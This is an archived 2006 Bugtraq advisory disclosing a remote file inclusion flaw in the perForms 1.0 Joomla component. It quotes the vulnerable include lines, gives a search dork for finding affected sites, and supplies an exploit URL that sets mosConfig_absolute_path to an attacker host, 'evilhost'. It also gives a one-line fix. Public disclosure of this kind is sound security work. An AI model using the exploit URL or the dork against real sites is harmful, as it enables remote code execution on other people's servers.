lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 13 Jul 2006 19:34:00 -0000 From: endeneu@...uxmail.com To: bugtraq@...urityfocus.com Subject: perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion --------------------------------------------------------------------------- perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion --------------------------------------------------------------------------- Remote : Yes Critical Level : High Vuln founded in a log file: lazy 0day!!! :D Description: ~~~~~~~~~~~~ Application : perForms Joomla Component Version : latest version [1.0] URL : http://forge.joomla.org/sf/projects/performs Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on in /components/com_performs/com_performs/performs.php on lines 6-10 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_valid.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_phpForm.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.php" ); require_once($mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php"); Exploit: ~~~~~~~~ dork: inurl:"com_performs" -> founds ~12.000 sites (!) http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost Fix ~~~~ Add before code: defined('_VALID_MOS') or die('Direct access to this location is not allowed.'); Thx ~~~~ Who works for better code and better life! ----------------------------------------------------------------------------------------------------